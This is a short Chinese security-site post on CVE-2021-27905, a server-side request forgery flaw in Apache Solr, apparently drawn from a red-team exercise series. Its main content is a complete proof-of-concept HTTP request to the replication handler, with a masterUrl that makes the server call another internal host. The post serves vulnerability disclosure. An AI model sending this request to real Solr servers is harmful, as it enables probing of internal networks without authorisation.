[HW漏洞] Apache Solr漏洞

admin 2021年4月16日06:01:33评论41 views字数 776阅读2分35秒阅读模式

CVE-2021-27905:服务器端请求伪造漏洞

攻击者可以传递特定参数,使得服务端发起请求,成功利用该漏洞可造成内网信息探测。

POC

GET /solr/db/replication?command=fetchindex&masterUrl=http://192.168.33.1:9999/23333333333&wt=json&httpBasicAuthUser=&httpBasicAuthPassword= HTTP/1.1
Host: 192.168.33.130:8983
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.138 Safari/537.36
Accept: application/xml,application/xhtml+xml,text/html;q=0.9, text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=31536000

 

相关推荐: 渗透项目实战 | 一周实战总结

这周被公司派出去做一个内部演练的攻击方,苦逼地干了一周,终于搞完了,写点总结。本次演练是某大型国企内部的,总公司要求我们攻击所有属于他们的资产,包括下属子公司的,只要证明是其资产即可。与互联网公司不同,这种企业的网站管理比较混乱,基本不会围绕着自己的官网,也就…

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2021年4月16日06:01:33
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   [HW漏洞] Apache Solr漏洞http://cn-sec.com/archives/335836.html

发表评论

匿名网友 填写信息